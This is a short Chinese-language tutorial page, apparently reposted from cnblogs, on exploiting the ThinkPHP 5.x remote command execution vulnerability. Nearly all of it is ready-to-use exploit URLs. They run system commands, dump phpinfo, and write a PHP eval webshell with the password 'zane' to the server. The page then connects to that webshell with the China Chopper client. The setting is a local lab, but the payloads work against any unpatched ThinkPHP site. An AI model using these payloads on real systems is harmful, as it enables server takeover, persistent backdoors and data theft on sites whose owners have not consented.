首頁 > php框架 > ThinkPHP > 關於ThinkPHP漏洞利用

關於ThinkPHP漏洞利用

藏色散人
發布: 2020-08-31 13:37:53
轉載
3032 人瀏覽過

下面由thinkphp框架教學欄位介紹ThinkPHP 漏洞利用,希望對需要的朋友有幫助!

關於ThinkPHP漏洞利用

thinkphp_5x_指令執行漏洞

#受影響版本包括5.0和5.1版本

docker漏洞環境原始碼:
https://github.com/vulnspy/thinkphp-5.1.29
本機環境建置:
thinkphp5.0.15 php5.6n apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函數遠端指令執行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

透過phpinfo函數寫出phpinfo()訊息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index .php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

寫入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
登入後複製

#使用菜刀連接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密碼為zane

##http://127.0.0.1/middleware/thinkphp_5.0.15_full/ test.php        密碼為zane

`

以上是關於ThinkPHP漏洞利用的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:cnblogs.com
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板